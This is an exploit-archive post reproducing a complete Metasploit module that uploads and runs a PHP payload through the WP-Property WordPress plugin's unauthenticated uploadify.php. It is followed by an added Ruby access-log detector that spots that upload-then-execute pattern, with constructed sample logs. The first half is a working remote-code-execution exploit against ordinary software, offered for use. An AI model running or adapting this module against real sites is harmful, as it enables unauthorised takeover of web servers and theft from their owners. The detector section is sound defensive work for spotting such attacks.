WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987' ],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probe for the plugin's bundled uploadify.php; a 200 means the plugin appears installed.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body uploadify.php expects: the file in "Filedata"
    # and the destination directory in "folder".
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # uploadify.php answers with the URI of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this is written in or how to use it. I mean msf.
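The module above leaves a recognisable two-step footprint in the web server's access log: an unauthenticated POST to the plugin's bundled uploadify.php, then a GET for a freshly named .php file in the same uploadify directory from the same client. The following detector is an added example for defenders, not part of the original post or of the Metasploit module; it parses combined-format access log lines and reports clients that show that sequence. The log lines, client addresses and the file name abcde.php are constructed for the example.

```ruby
# Added example (not from the original post or the Metasploit module): scan
# combined-format access log lines for the upload-then-execute pattern that
# abuse of the WP-Property bundled uploadify.php produces.

UPLOADIFY_DIR = "/wp-content/plugins/wp-property/third-party/uploadify/"

# Combined log format: host ident user [time] "METHOD PATH PROTO" status bytes "referer" "agent"
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Parse one log line into a hash, or nil if the line is not in combined format.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  {
    ip: m[:ip],
    time: m[:time],
    method: m[:method],
    path: m[:path].split('?').first, # drop any query string
    status: m[:status].to_i
  }
end

# Returns one finding per client that POSTed to uploadify.php (HTTP 200) and
# afterwards requested some other .php file from the uploadify directory.
def detect_uploadify_abuse(lines)
  uploaders = {} # ip => time of the first successful-looking POST
  findings = []
  lines.each do |line|
    ev = parse_line(line)
    next unless ev
    next unless ev[:path].include?(UPLOADIFY_DIR)
    if ev[:method] == 'POST' && ev[:path].end_with?('uploadify.php') && ev[:status] == 200
      uploaders[ev[:ip]] ||= ev[:time]
    elsif ev[:method] == 'GET' && ev[:path].end_with?('.php') &&
          !ev[:path].end_with?('uploadify.php') && uploaders.key?(ev[:ip])
      findings << { ip: ev[:ip], uploaded_at: uploaders[ev[:ip]],
                    executed: ev[:path], executed_at: ev[:time] }
    end
  end
  findings
end

# Constructed sample log lines (not real traffic): one client runs the full
# probe / upload / execute sequence, another only fetches the Flash uploader.
SAMPLE_LOG = [
  '203.0.113.7 - - [04/Jan/2013:19:51:30 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [04/Jan/2013:19:51:31 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 98 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [04/Jan/2013:19:51:32 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/abcde.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [04/Jan/2013:20:00:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.swf HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [04/Jan/2013:20:00:02 +0800] "GET /wordpress/?p=1 HTTP/1.1" 200 5000 "-" "Mozilla/5.0"'
]

if __FILE__ == $0
  detect_uploadify_abuse(SAMPLE_LOG).each do |f|
    puts "#{f[:ip]}: POST to uploadify.php at #{f[:uploaded_at]}, then GET #{f[:executed]} at #{f[:executed_at]}"
  end
end
```

The detector keys on the request path only, because the "folder" and "Filedata" fields travel in the POST body and are not written to a standard access log; a single POST to uploadify.php from an unauthenticated client is itself worth alerting on, since the plugin's legitimate uploads come from logged-in users of the admin interface.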